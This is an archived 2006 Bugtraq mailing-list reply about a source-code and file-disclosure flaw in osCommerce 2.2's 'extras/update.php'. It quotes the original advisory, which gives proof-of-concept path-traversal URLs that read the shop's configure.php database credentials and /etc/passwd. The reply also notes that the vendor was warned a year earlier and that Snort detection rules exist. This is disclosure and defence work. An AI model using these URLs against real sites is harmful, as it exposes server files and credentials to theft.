| lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
|
Open Source and information security mailing list archives
| ||
|
Date: Sat, 15 Apr 2006 08:39:14 -0400 From: "Michael Scheidell" <scheidell@...nap.net> To: <rgod@...istici.org>, <bugtraq@...urityfocus.com> Cc: <andiroo@...il.com> Subject: RE: osCommerce "extras/" information/source code disclosure > -----Original Message----- > From: rgod@...istici.org [mailto:rgod@...istici.org] > Sent: Friday, April 14, 2006 7:20 AM > To: bugtraq@...urityfocus.com > Subject: osCommerce "extras/" information/source code disclosure > > > ---- osCommerce <= 2.2 "extras/" information/source code > disclosure ------------ > > software site: http://www.oscommerce.com/ > > > if extras/ folder is placed inside the www path, you can see > all files on target system, including php source code with > database details, poc: > http://[target]/[path]/extras/update.php?read_me=0&readme_file=../catalo g/includes/configure.php http://[target]/[path]/extras/update.php?read_me=0&readme_file=/etc/pass wd Amazing: this was reported to oscommerce almost a year ago by andiroo blat gmail, and they didn't do anything about it? http://sourceforge.net/mailarchive/message.php?msg_id=12318248 http://www.oscommerce.com/community/bugs,2835 For you snorters, rules have been posted to snort-sigs and bleeding mailing list.
Powered by blists - more mailing lists